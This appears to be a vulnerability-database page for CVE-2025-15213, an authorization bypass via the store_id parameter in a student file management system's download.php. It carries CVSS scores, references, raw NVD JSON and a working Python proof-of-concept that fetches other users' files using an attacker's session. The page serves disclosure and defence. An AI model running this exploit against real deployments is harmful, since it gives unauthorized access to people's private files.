CVE-2025-15213

Description

A vulnerability has been found in code-projects Student File Management System 1.0. The affected element is an unknown function of the file /download.php of the component File Download Handler. The manipulation of the argument store_id leads to improper authorization. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fabian:student_file_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Student File Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-15213 PoC - Student File Management System 1.0 Authorization Bypass
# Affected Component: /download.php File Download Handler
# Vulnerability: Improper Authorization via store_id parameter

import requests
import sys
from urllib.parse import urlencode

def exploit_auth_bypass(base_url, attacker_session, target_store_id):
    """
    Exploit improper authorization in Student File Management System 1.0
    
    Args:
        base_url: Target application base URL
        attacker_session: Valid session cookie/token for authenticated attacker
        target_store_id: store_id of victim user to access files from
    
    Returns:
        Response content if exploitation successful, None otherwise
    """
    
    # Construct malicious download request with arbitrary store_id
    download_endpoint = f"{base_url}/download.php"
    
    params = {
        'store_id': target_store_id  # Unchecked authorization parameter
    }
    
    headers = {
        'Cookie': f'session={attacker_session}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        response = requests.get(
            download_endpoint,
            params=params,
            headers=headers,
            timeout=10
        )
        
        if response.status_code == 200:
            print(f"[!] Successfully accessed files for store_id: {target_store_id}")
            print(f"[*] Response headers: {dict(response.headers)}")
            return response.content
        else:
            print(f"[*] Request failed with status: {response.status_code}")
            return None
            
    except requests.RequestException as e:
        print(f"[!] Request error: {e}")
        return None

def main():
    if len(sys.argv) < 4:
        print("Usage: python3 cve_2025_15213_poc.py <base_url> <session_cookie> <target_store_id>")
        print("Example: python3 cve_2025_15213_poc.py http://target.com 'abc123' '5'")
        sys.exit(1)
    
    base_url = sys.argv[1].rstrip('/')
    session = sys.argv[2]
    target_id = sys.argv[3]
    
    print(f"[*] Targeting: {base_url}")
    print(f"[*] Exploiting store_id: {target_id}")
    
    result = exploit_auth_bypass(base_url, session, target_id)
    
    if result:
        print("[+] Exploitation successful - unauthorized file access achieved")
    else:
        print("[-] Exploitation failed")

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15213
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15213
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15213/
[4] VulDB https://vuldb.com/cve/CVE-2025-15213
[5] https://code-projects.org/
[6] https://github.com/Bai-public/CVE/issues/5
[7] https://vuldb.com/?ctiid.338598
[8] https://vuldb.com/?id.338598
[9] https://vuldb.com/?submit.725080

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15213", "sourceIdentifier": "[email protected]", "published": "2025-12-30T01:15:41.173", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in code-projects Student File Management System 1.0. The affected element is an unknown function of the file /download.php of the component File Download Handler. The manipulation of the argument store_id leads to improper authorization. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:student_file_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8AA96545-7C5D-4A6E-8928-7A86633627FC"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Bai-public/CVE/issues/5", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338598", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338598", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.725080", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}